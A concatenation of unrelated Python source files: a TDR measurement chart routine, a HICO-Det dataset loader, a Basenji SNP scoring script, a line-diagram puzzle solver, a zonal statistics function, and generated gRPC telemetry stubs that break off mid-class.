self.numTDRCursorX1.blockSignals(True)
self.numTDRCursorX2.blockSignals(True)
self.numTDRCursorX1.setValue(x1)
self.numTDRCursorX2.setValue(x2)
self.numTDRCursorX1.blockSignals(False)
self.numTDRCursorX2.blockSignals(False)
if x1 > x2:
tmp = x1
x1 = x2
x2 = tmp
# Fetch X-axis mapping
offsetPS = Connect.getDevice().Tdr.Cfg.getOffsetPS()
spanPS = Connect.getDevice().Tdr.Cfg.getSpanPS()
reclen = Connect.getDevice().Tdr.Cfg.getReclen()
# print("offsetPS =", offsetPS, ", spanPS =", spanPS, ", reclen =", reclen);
# Fetch important settings
bw = Connect.getDevice().Tdr.Cfg.getBWGHz()
usingDiff = Connect.getDevice().Tdr.Cfg.getUseDiff()
avg = Connect.getDevice().Tdr.Cfg.getAvg()
calState = Connect.getDevice().Tdr.getCalState()
self.TDRchartLeft = Connect.getDevice().Tdr.Chart.getLeftPS()
self.TDRchartWidth = Connect.getDevice().Tdr.Chart.getWidthPS()
# print("bw =", bw, ", usingDiff =", usingDiff, ", avg =", avg, ", calState =", calState);
# Fetch short calibration file names and contents, and extract date-time
shortCalFile = Connect.getDevice().Tdr.getShortCalFile()
shortCal = Connect.getDevice().File.Fetch(shortCalFile).decode(encoding='utf-8')
shortCalLines = shortCal.splitlines()
shortCalDateTime = "UNK"
for index in range(len(shortCalLines)):
cols = shortCalLines[index].split(',')
if len(cols) == 2 and cols[0].strip() == "DATETIME":
shortCalDateTime = cols[1].strip()[-20:]
break
pass
# Fetch termination calibration file names and contents, and extract date-time
termCalFile = Connect.getDevice().Tdr.getTermCalFile()
termCal = Connect.getDevice().File.Fetch(termCalFile).decode(encoding='utf-8')
termCalLines = termCal.splitlines()
termCalDateTime = "UNK"
for index in range(len(termCalLines)):
cols = termCalLines[index].split(',')
if len(cols) == 2 and cols[0].strip() == "DATETIME":
termCalDateTime = cols[1].strip()[-20:]
break
pass
# Fetch trace data data_y, calculate min, max, average
data_y = Connect.getDevice().Tdr.getBinary()
SENTINEL = 999999.999
minimum = SENTINEL
maximum = -SENTINEL
accum = 0.0
count = 0
data_x = numpy.empty(len(data_y), float)
for index in range(reclen):
ps = offsetPS + (index * spanPS) / reclen
ohm = data_y[index]
data_x[index] = ps
if x1 <= ps <= x2:
if ohm < minimum:
minimum = ohm
if ohm > maximum:
maximum = ohm
accum = accum + ohm
count = count + 1
pass
pass
# print("TDR count =", count, "minimum =", minimum, "maximum =", maximum, "accum =", accum)
# Duplicate values in second array for area between two cursors
selected_x = numpy.empty(count, float)
selected_y = numpy.empty(count, float)
selected_count = 0
for index in range(reclen):
if x1 <= data_x[index] <= x2:
selected_x[selected_count] = data_x[index]
selected_y[selected_count] = data_y[index]
selected_count = selected_count + 1
pass
pass
# Assign results into Gui widgets
self.editTDRShortCalib.setText(shortCalDateTime)
self.editTDRTermCalib.setText(termCalDateTime)
# Build meta-data string
metaData = "Record len: " + ("{:.0f}".format(reclen)) + "\n" + \
"Averages: " + ("{:.0f}".format(avg)) + "\n" + \
"B/W limit: " + ("0 GHz" if bw == 0 else "{:.3f} GHz".format(bw)) + "\n" + \
"Differential: " + ("Yes" if usingDiff else "No") + "\n\n" + \
"Selected region:\n" + \
" min " + ("n/a" if minimum == SENTINEL else "{:.2f} ohm".format(minimum)) + "\n" + \
" max " + ("n/a" if maximum == -SENTINEL else "{:.2f} ohm".format(maximum)) + "\n" + \
" avg " + ("n/a" if count == 0 else "{:.2f} ohm".format(accum / count)) + "\n" + \
" (" + ("{:.0f} samples".format(count)) + ")"
# Build chart for screen display
self.TDRchartFigure.clear()
plot = self.TDRchartFigure.add_subplot(1, 1, 1)
plot.plot(data_x, data_y)
plot.plot(selected_x, selected_y)
plot.set_title("TDR" if self.editResultsName.text() == "" else self.editResultsName.text() + "\nTDR",
fontsize=9)
plot.set_xlabel("ps", fontsize=9)
plot.set_ylabel("ohm", fontsize=9)
plot.set_xlim(self.TDRchartLeft, self.TDRchartLeft+self.TDRchartWidth)
plot.grid()
t = plot.text(0.95, 0.95, metaData,
backgroundcolor="lightyellow",
verticalalignment="top",
horizontalalignment="right",
fontsize=8,
transform=plot.transAxes
)
t.set_bbox(dict(facecolor='lightyellow', alpha=0.6))
self.TDRchartCanvas.draw()
self.TDRcurrentPlot = plot
# Create duplicate chart for "save" function so not dependent on viewing configuration
self.TDRshadowFigure.clear()
plot2 = self.TDRshadowFigure.add_subplot(1, 1, 1)
plot2.plot(data_x, data_y)
plot2.plot(selected_x, selected_y)
plot2.set_title("TDR" if self.editResultsName.text() == "" else self.editResultsName.text() + "\nTDR",
fontsize=9)
plot2.set_xlabel("ps", fontsize=9)
plot2.set_ylabel("ohm", fontsize=9)
plot.set_xlim(self.TDRchartLeft, self.TDRchartLeft+self.TDRchartWidth)
plot2.grid()
t = plot2.text(0.95, 0.95, metaData,
backgroundcolor="lightyellow",
verticalalignment="top",
horizontalalignment="right",
fontsize=8,
transform=plot2.transAxes
)
t.set_bbox(dict(facecolor='lightyellow', alpha=0.6))
self.TDRshadowCanvas.draw()
self.TDRcurrentShadowPlot = plot2
# build log file contents
self.TDRResultsDateTime = datetime.datetime.now()
header_str = "Results, Date, Time, Parameter, Index, x, Value"
results_str = self.editResultsName.text().strip()
date_str = self.TDRResultsDateTime.strftime("%m/%d/%Y")
time_str = self.TDRResultsDateTime.strftime("%H:%M:%S")
try:
self.TDRLogFileContents = header_str + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"X1" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(x1) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"X2" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(x2) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELCNT" + "," + "-1" + "," + "-1" + "," + "{:.0f}".format(count) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELMIN" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(minimum) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELMAX" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(maximum) + "\n"
average_number = -1.0
if count > 0:
average_number = accum / count
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELAVG" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(average_number) + "\n"
for index in range(reclen):
index_str = "{:.0f}".format(index)
x_value_str = "{:.3f}".format(offsetPS + (index * spanPS) / reclen)
y_value_str = "{:.2f}".format(data_y[index])
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"TDR" + "," + index_str + "," + x_value_str + "," + y_value_str + "\n"
pass
for index in range(len(selected_y)):
index_str = "{:.0f}".format(index)
x_value_str = "{:.3f}".format(selected_x[index])
y_value_str = "{:.2f}".format(selected_y[index])
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELTDR" + "," + index_str + "," + x_value_str + "," + y_value_str + "\n"
pass
except Exception as e:
print("Problem building pivot file contents: ", e)
raise e
# EOF
|
import json
import numpy as np
import os
import os.path as osp
from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
import random
import torch
from torch.utils.data import Dataset
class HICODetDataset(Dataset):
def __init__(self,
cfg,
data_root,
transform=None,
istrain=False,
):
"""
Args:
data_root: absolute root path for train or val data folder
transform: train_transform or eval_transform or prediction_transform
"""
self.num_classes_verb = cfg.DATASET.REL_NUM_CLASSES
self.data_root = data_root
self.labels_path = osp.join(osp.abspath(
self.data_root), 'anno.json')
self.transform = transform
self.hoi_annotations = json.load(open(self.labels_path, 'r'))
self.ids = []
for i, hico in enumerate(self.hoi_annotations):
flag_bad = 0
if len(hico['annotations']) > cfg.TRANSFORMER.NUM_QUERIES:
flag_bad = 1
continue
for hoi in hico['hoi_annotation']:
if hoi['subject_id'] >= len(hico['annotations']) or hoi[
'object_id'] >= len(hico['annotations']):
flag_bad = 1
break
if flag_bad == 0:
self.ids.append(i)
self.neg_rel_id = 0
def __len__(self):
return len(self.ids)
def multi_dense_to_one_hot(self, labels, num_classes):
num_labels = labels.shape[0]
index_offset = np.arange(num_labels) * num_classes
labels_one_hot = np.zeros((num_labels, num_classes))
labels_one_hot.flat[index_offset + labels.ravel()] = 1
one_hot = np.sum(labels_one_hot, axis=0)[1:]
in_valid = np.where(one_hot>1)[0]
one_hot[in_valid] = 1
return one_hot
def __getitem__(self, index):
ann_id = self.ids[index]
file_name = self.hoi_annotations[ann_id]['file_name']
img_path = os.path.join(self.data_root, file_name)
anns = self.hoi_annotations[ann_id]['annotations']
hoi_anns = self.hoi_annotations[ann_id]['hoi_annotation']
if not osp.exists(img_path):
logging.error("Cannot found image data: " + img_path)
raise FileNotFoundError
img = Image.open(img_path).convert('RGB')
w, h = img.size
num_object = len(anns)
num_rels = len(hoi_anns)
boxes = []
labels = []
no_object = False
if num_object == 0:
# no gt boxes
no_object = True
boxes = np.array([]).reshape(-1, 4)
labels = np.array([]).reshape(-1,)
else:
for k in range(num_object):
ann = anns[k]
boxes.append(np.asarray(ann['bbox']))
if isinstance(ann['category_id'], str):
ann['category_id'] = int(ann['category_id'].replace('\n', ''))
cls_id = int(ann['category_id'])
labels.append(cls_id)
boxes = np.vstack(boxes)
boxes = torch.from_numpy(boxes.reshape(-1, 4).astype(np.float32))
labels = np.array(labels).reshape(-1,)
target = dict(
boxes=boxes,
labels=labels
)
if self.transform is not None:
img, target = self.transform(
img, target
)
target['labels'] = torch.from_numpy(target['labels']).long()
boxes = target['boxes']
hoi_labels = []
hoi_boxes = []
if num_object == 0:
hoi_boxes = torch.from_numpy(np.array([]).reshape(-1, 4))
hoi_labels = np.array([]).reshape(-1, self.num_classes_verb)
else:
for k in range(num_rels):
hoi = hoi_anns[k]
if not isinstance(hoi['category_id'], list):
hoi['category_id'] = [hoi['category_id']]
hoi_label_np = np.array(hoi['category_id'])
hoi_labels.append(self.multi_dense_to_one_hot(hoi_label_np,
self.num_classes_verb+1))
sub_ct_coord = boxes[hoi['subject_id']][..., :2]
obj_ct_coord = boxes[hoi['object_id']][..., :2]
hoi_boxes.append(torch.cat([sub_ct_coord, obj_ct_coord], dim=-1).reshape(-1, 4))
hoi_labels = np.array(hoi_labels).reshape(-1, self.num_classes_verb)
target['rel_labels'] = torch.from_numpy(hoi_labels)
if len(hoi_boxes) == 0:
target['rel_vecs'] = torch.from_numpy(np.array([]).reshape(-1, 4)).float()
else:
target['rel_vecs'] = torch.cat(hoi_boxes).reshape(-1, 4).float()
target['size'] = torch.from_numpy(np.array([h, w]))
return img, target, file_name
|
#!/usr/bin/env python
# Copyright 2017 Calico LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from __future__ import print_function
from optparse import OptionParser
import gc
import json
import pdb
import pickle
import os
from queue import Queue
import sys
from threading import Thread
import time
import h5py
import numpy as np
import pandas as pd
import pysam
import tensorflow as tf
if tf.__version__[0] == '1':
tf.compat.v1.enable_eager_execution()
from basenji import dna_io
from basenji import seqnn
from basenji import vcf as bvcf
from basenji import stream
from basenji_sad import SNPWorker, initialize_output_h5, write_pct, write_snp
'''
basenji_sad_ref.py
Compute SNP Activity Difference (SAD) scores for SNPs in a VCF file.
This versions saves computation by clustering nearby SNPs in order to
make a single reference prediction for several SNPs.
'''
################################################################################
# main
################################################################################
def main():
usage = 'usage: %prog [options] <params_file> <model_file> <vcf_file>'
parser = OptionParser(usage)
parser.add_option('-c', dest='center_pct',
default=0.25, type='float',
help='Require clustered SNPs lie in center region [Default: %default]')
parser.add_option('-f', dest='genome_fasta',
default='%s/data/hg19.fa' % os.environ['BASENJIDIR'],
help='Genome FASTA for sequences [Default: %default]')
parser.add_option('--flip', dest='flip_ref',
default=False, action='store_true',
help='Flip reference/alternate alleles when simple [Default: %default]')
parser.add_option('-n', dest='norm_file',
default=None,
help='Normalize SAD scores')
parser.add_option('-o',dest='out_dir',
default='sad',
help='Output directory for tables and plots [Default: %default]')
parser.add_option('-p', dest='processes',
default=None, type='int',
help='Number of processes, passed by multi script')
parser.add_option('--pseudo', dest='log_pseudo',
default=1, type='float',
help='Log2 pseudocount [Default: %default]')
parser.add_option('--rc', dest='rc',
default=False, action='store_true',
help='Average forward and reverse complement predictions [Default: %default]')
parser.add_option('--shifts', dest='shifts',
default='0', type='str',
help='Ensemble prediction shifts [Default: %default]')
parser.add_option('--stats', dest='sad_stats',
default='SAD',
help='Comma-separated list of stats to save. [Default: %default]')
parser.add_option('-t', dest='targets_file',
default=None, type='str',
help='File specifying target indexes and labels in table format')
parser.add_option('--ti', dest='track_indexes',
default=None, type='str',
help='Comma-separated list of target indexes to output BigWig tracks')
parser.add_option('--threads', dest='threads',
default=False, action='store_true',
help='Run CPU math and output in a separate thread [Default: %default]')
parser.add_option('-u', dest='penultimate',
default=False, action='store_true',
help='Compute SED in the penultimate layer [Default: %default]')
(options, args) = parser.parse_args()
if len(args) == 3:
# single worker
params_file = args[0]
model_file = args[1]
vcf_file = args[2]
elif len(args) == 5:
# multi worker
options_pkl_file = args[0]
params_file = args[1]
model_file = args[2]
vcf_file = args[3]
worker_index = int(args[4])
# load options
options_pkl = open(options_pkl_file, 'rb')
options = pickle.load(options_pkl)
options_pkl.close()
# update output directory
options.out_dir = '%s/job%d' % (options.out_dir, worker_index)
else:
parser.error('Must provide parameters and model files and QTL VCF file')
if not os.path.isdir(options.out_dir):
os.mkdir(options.out_dir)
if options.track_indexes is None:
options.track_indexes = []
else:
options.track_indexes = [int(ti) for ti in options.track_indexes.split(',')]
if not os.path.isdir('%s/tracks' % options.out_dir):
os.mkdir('%s/tracks' % options.out_dir)
options.shifts = [int(shift) for shift in options.shifts.split(',')]
options.sad_stats = options.sad_stats.split(',')
#################################################################
# read parameters and targets
# read model parameters
with open(params_file) as params_open:
params = json.load(params_open)
params_model = params['model']
params_train = params['train']
if options.targets_file is None:
target_slice = None
else:
targets_df = pd.read_csv(options.targets_file, sep='\t', index_col=0)
target_ids = targets_df.identifier
target_labels = targets_df.description
target_slice = targets_df.index
if options.penultimate:
parser.error('Not implemented for TF2')
#################################################################
# setup model
seqnn_model = seqnn.SeqNN(params_model)
seqnn_model.restore(model_file)
seqnn_model.build_slice(target_slice)
seqnn_model.build_ensemble(options.rc, options.shifts)
num_targets = seqnn_model.num_targets()
if options.targets_file is None:
target_ids = ['t%d' % ti for ti in range(num_targets)]
target_labels = ['']*len(target_ids)
#################################################################
# load SNPs
# filter for worker SNPs
if options.processes is not None:
# determine boundaries
num_snps = bvcf.vcf_count(vcf_file)
worker_bounds = np.linspace(0, num_snps, options.processes+1, dtype='int')
# read sorted SNPs from VCF
snps = bvcf.vcf_snps(vcf_file, require_sorted=True, flip_ref=options.flip_ref,
validate_ref_fasta=options.genome_fasta,
start_i=worker_bounds[worker_index],
end_i=worker_bounds[worker_index+1])
else:
# read sorted SNPs from VCF
snps = bvcf.vcf_snps(vcf_file, require_sorted=True, flip_ref=options.flip_ref,
validate_ref_fasta=options.genome_fasta)
# cluster SNPs by position
snp_clusters = cluster_snps(snps, params_model['seq_length'], options.center_pct)
# delimit sequence boundaries
[sc.delimit(params_model['seq_length']) for sc in snp_clusters]
# open genome FASTA
genome_open = pysam.Fastafile(options.genome_fasta)
# make SNP sequence generator
def snp_gen():
for sc in snp_clusters:
snp_1hot_list = sc.get_1hots(genome_open)
for snp_1hot in snp_1hot_list:
yield snp_1hot
#################################################################
# setup output
snp_flips = np.array([snp.flipped for snp in snps], dtype='bool')
sad_out = initialize_output_h5(options.out_dir, options.sad_stats,
snps, target_ids, target_labels)
if options.threads:
snp_threads = []
snp_queue = Queue()
for i in range(1):
sw = SNPWorker(snp_queue, sad_out, options.sad_stats, options.log_pseudo)
sw.start()
snp_threads.append(sw)
#################################################################
# predict SNP scores, write output
# initialize predictions stream
preds_stream = stream.PredStreamGen(seqnn_model, snp_gen(), params['train']['batch_size'])
# predictions index
pi = 0
# SNP index
si = 0
for snp_cluster in snp_clusters:
ref_preds = preds_stream[pi]
pi += 1
for snp in snp_cluster.snps:
# print(snp, flush=True)
alt_preds = preds_stream[pi]
pi += 1
if snp_flips[si]:
ref_preds, alt_preds = alt_preds, ref_preds
if options.threads:
# queue SNP
snp_queue.put((ref_preds, alt_preds, si))
else:
# process SNP
write_snp(ref_preds, alt_preds, sad_out, si,
options.sad_stats, options.log_pseudo)
# update SNP index
si += 1
# finish queue
if options.threads:
print('Waiting for threads to finish.', flush=True)
snp_queue.join()
# close genome
genome_open.close()
###################################################
# compute SAD distributions across variants
write_pct(sad_out, options.sad_stats)
sad_out.close()
def cluster_snps(snps, seq_len, center_pct):
"""Cluster a sorted list of SNPs into regions that will satisfy
the required center_pct."""
valid_snp_distance = int(seq_len*center_pct)
snp_clusters = []
cluster_chr = None
for snp in snps:
if snp.chr == cluster_chr and snp.pos < cluster_pos0 + valid_snp_distance:
# append to latest cluster
snp_clusters[-1].add_snp(snp)
else:
# initialize new cluster
snp_clusters.append(SNPCluster())
snp_clusters[-1].add_snp(snp)
cluster_chr = snp.chr
cluster_pos0 = snp.pos
return snp_clusters
class SNPCluster:
def __init__(self):
self.snps = []
self.chr = None
self.start = None
self.end = None
def add_snp(self, snp):
self.snps.append(snp)
def delimit(self, seq_len):
positions = [snp.pos for snp in self.snps]
pos_min = np.min(positions)
pos_max = np.max(positions)
pos_mid = (pos_min + pos_max) // 2
self.chr = self.snps[0].chr
self.start = pos_mid - seq_len//2
self.end = self.start + seq_len
for snp in self.snps:
snp.seq_pos = snp.pos - 1 - self.start
def get_1hots(self, genome_open):
seqs1_list = []
# extract reference
if self.start < 0:
ref_seq = 'N'*(-self.start) + genome_open.fetch(self.chr, 0, self.end).upper()
else:
ref_seq = genome_open.fetch(self.chr, self.start, self.end).upper()
# extend to full length
if len(ref_seq) < self.end - self.start:
ref_seq += 'N'*(self.end-self.start-len(ref_seq))
# verify reference alleles
for snp in self.snps:
ref_n = len(snp.ref_allele)
ref_snp = ref_seq[snp.seq_pos:snp.seq_pos+ref_n]
if snp.ref_allele != ref_snp:
print('ERROR: %s does not match reference %s' % (snp, ref_snp), file=sys.stderr)
exit(1)
# 1 hot code reference sequence
ref_1hot = dna_io.dna_1hot(ref_seq)
seqs1_list = [ref_1hot]
# make alternative 1 hot coded sequences
# (assuming SNP is 1-based indexed)
for snp in self.snps:
alt_1hot = make_alt_1hot(ref_1hot, snp.seq_pos, snp.ref_allele, snp.alt_alleles[0])
seqs1_list.append(alt_1hot)
return seqs1_list
def make_alt_1hot(ref_1hot, snp_seq_pos, ref_allele, alt_allele):
"""Return alternative allele one hot coding."""
ref_n = len(ref_allele)
alt_n = len(alt_allele)
# copy reference
alt_1hot = np.copy(ref_1hot)
if alt_n == ref_n:
# SNP
dna_io.hot1_set(alt_1hot, snp_seq_pos, alt_allele)
elif ref_n > alt_n:
# deletion
delete_len = ref_n - alt_n
if (ref_allele[0] == alt_allele[0]):
dna_io.hot1_delete(alt_1hot, snp_seq_pos+1, delete_len)
else:
print('WARNING: Delection first nt does not match: %s %s' % (ref_allele, alt_allele), file=sys.stderr)
else:
# insertion
if (ref_allele[0] == alt_allele[0]):
dna_io.hot1_insert(alt_1hot, snp_seq_pos+1, alt_allele[1:])
else:
print('WARNING: Insertion first nt does not match: %s %s' % (ref_allele, alt_allele), file=sys.stderr)
return alt_1hot
################################################################################
# __main__
################################################################################
if __name__ == '__main__':
main()
|
from dataclasses import InitVar
from dataclasses import dataclass
from dataclasses import field
from typing import Iterable
from typing import List
from typing import Tuple
@dataclass(frozen=True)
class Line:
x1: int
y1: int
x2: int
y2: int
def is_straight(self) -> bool:
return self.x1 == self.x2 or self.y1 == self.y2
def as_tuple(self) -> Tuple[int, int, int, int]:
return self.x1, self.y1, self.x2, self.y2
@dataclass
class Diagram:
input_lines: InitVar
lines: List[Line] = field(init=False, default_factory=list)
points: List[List[int]] = field(init=False, default_factory=list)
def __post_init__(self, input_lines: Iterable[Tuple[List[str]]]):
width, height = 0, 0
# generate lines
for (line_start, line_end) in input_lines:
line = Line(*(map(int, line_start)), *(map(int, line_end)))
width = max(width, max(line.x1, line.x2) + 1)
height = max(height, max(line.y1, line.y2) + 1)
self.lines.append(line)
# generate empty point map
self.points = [[0 for _ in range(width)] for _ in range(height)]
def plot_point(self, x: int, y: int):
self.points[y][x] += 1
def walk(lines: Iterable[Line]) -> Iterable[Tuple[int, int]]:
for line in lines:
# extract coordinates
x0, y0, x1, y1 = line.as_tuple()
# calculate initial deltas
dx = abs(x1 - x0)
sx = 1 if x0 < x1 else -1
dy = -abs(y1 - y0)
sy = 1 if y0 < y1 else -1
# use integer incremental error to perform octant line draws
# source: (https://en.wikipedia.org/wiki/Bresenham's_line_algorithm#All_cases)
err = dx + dy
while True:
yield x0, y0
if x0 == x1 and y0 == y1:
break
e2 = 2 * err
if e2 >= dy:
err += dy
x0 += sx
if e2 <= dx:
err += dx
y0 += sy
def solution_1(input: List[str]) -> int:
normalized_lines = [(s.split(","), e.split(",")) for d in input for s, e in [d.split(" -> ")]]
diagram = Diagram(normalized_lines)
for x, y in walk(filter(lambda l: l.is_straight(), diagram.lines)):
diagram.plot_point(x, y)
results = len([v for y in diagram.points for v in y if v > 1])
return results
def solution_2(input: List[str]) -> int:
normalized_lines = [(s.split(","), e.split(",")) for d in input for s, e in [d.split(" -> ")]]
diagram = Diagram(normalized_lines)
for x, y in walk(diagram.lines):
diagram.plot_point(x, y)
results = len([v for y in diagram.points for v in y if v > 1])
return results
|
import numpy as np
import pandas as pd
def zonal_stats(zones, values, stats=['mean', 'max', 'min', 'std', 'var']):
"""Calculate statistics for each zone defined by a zone dataset, based on
values from another dataset (value raster).
A single output value is computed for each zone in the input zone dataset.
Parameters
----------
zones: xarray.DataArray,
Zone are defined by cells that have the same value,
whether or not they are contiguous. The input zone layer defines
the shape, values, and locations of the zones. An integer field
in the zone input is specified to define the zones.
values: xarray.DataArray,
values represent the value raster to be summarized as either integer or float.
The value raster contains the input values used in calculating
the output statistic for each zone.
stats: list of strings or dictionary<stat_name: function(zone_values)>.
Which statistics to calculate for each zone.
If a list, possible choices are subsets of
['mean', 'max', 'min', 'std', 'var']
In the dictionary case, all of its values must be callable.
Function takes only one argument that is the zone values.
The key become the column name in the output DataFrame.
Returns
-------
zonal_stats_df: pandas.DataFrame
A pandas DataFrame where each column is a statistic
and each row is a zone with zone id.
"""
if zones.dtype in (np.float32, np.float64):
zones_val = np.nan_to_num(zones.values).astype(np.int)
else:
zones_val = zones.values
values_val = values.values
assert zones_val.shape == values_val.shape,\
"`zones.values` and `values.values` must have same shape"
assert issubclass(type(zones_val[0, 0]), np.integer),\
"`zones.values` must be an array of integer"
assert issubclass(type(values_val[0, 0]), np.integer) or\
issubclass(type(values_val[0, 0]), np.float),\
"`values.values` must be an array of integer or float"
unique_zones = np.unique(zones_val).astype(int)
num_zones = len(unique_zones)
# do not consider zone with 0s
if 0 in unique_zones:
num_zones = len(unique_zones) - 1
# mask out all invalid values_val such as: nan, inf
masked_values = np.ma.masked_invalid(values_val)
if isinstance(stats, dict):
cols = stats.keys()
zonal_stats_df = pd.DataFrame(columns=list(cols))
for zone_id in unique_zones:
# do not consider 0 pixels as a zone
if zone_id == 0:
continue
# get zone values_val
zone_values = np.ma.masked_where(zones_val != zone_id,
masked_values)
zone_stats = []
for stat in stats:
stat_func = stats.get(stat)
if not callable(stat_func):
raise ValueError(stat)
zone_stats.append(stat_func(zone_values))
zonal_stats_df.loc[zone_id] = zone_stats
else:
zonal_stats_df = pd.DataFrame(columns=stats)
for zone_id in unique_zones:
# do not consider 0 pixels as a zone
if zone_id == 0:
continue
# get zone values_val
zone_values = np.ma.masked_where(zones_val != zone_id,
masked_values)
zone_stats = []
for stat in stats:
if stat == 'mean':
zone_stats.append(zone_values.mean())
elif stat == 'max':
zone_stats.append(zone_values.max())
elif stat == 'min':
zone_stats.append(zone_values.min())
elif stat == 'std':
zone_stats.append(zone_values.std())
elif stat == 'var':
zone_stats.append(zone_values.var())
else:
err_str = 'In function zonal_stats(). '\
+ '\'' + stat + '\' option not supported.'
raise ValueError(err_str)
zonal_stats_df.loc[zone_id] = zone_stats
num_df_rows = len(zonal_stats_df.index)
assert num_df_rows == num_zones,\
'Output dataframe must have same number of rows as of zones.values'
return zonal_stats_df
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from telemetry.v1beta3 import GenericEvents_Beta3_pb2 as telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2
from telemetry.v1beta3 import TelemetryService_Beta3_pb2 as telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2
class EventTelemetryStub(object):
"""Provides support for transmission of operational and experiential telemetry data from first and second-party devices.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Ping = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Ping',
request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Request.SerializeToString,
response_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Response.FromString,
)
self.Event = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Event',
request_serializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.Request.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Batch = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Batch',
request_serializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.BatchRequest.SerializeToString,
response_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryResponse.FromString,
)
self.Error = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Error',
request_serializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Exception.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class EventTelemetryServicer(object):
"""Provides support for transmission of operational and experiential telemetry data from first and second-party devices.
"""
def Ping(self, request, context):
"""Ping the server.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Event(self, request, context):
"""Submit a generic event.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Batch(self, request, context):
"""Submit one or more generic events via the batch interface.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Error(self, request, context):
"""Submit one or more exception events.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_EventTelemetryServicer_to_server(servicer, server):
rpc_method_handlers = {
'Ping': grpc.unary_unary_rpc_method_handler(
servicer.Ping,
request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Request.FromString,
response_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Response.SerializeToString,
),
'Event': grpc.unary_unary_rpc_method_handler(
servicer.Event,
request_deserializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.Request.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Batch': grpc.unary_unary_rpc_method_handler(
servicer.Batch,
request_deserializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.BatchRequest.FromString,
response_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryResponse.SerializeToString,
),
'Error': grpc.unary_unary_rpc_method_handler(
servicer.Error,
request_deserializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Exception.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'bloombox.schema.services.telemetry.v1beta3.EventTelemetry', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
class CommercialTelemetryStub(object):
"""Provides support for tailored analytics payloads w.r.t. interactions between end-users and commercial models, like
menu sections, products, and user orders.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Impression = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry/Impression',
request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Impression.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.View = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry/View',
request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.View.SerializeToString,
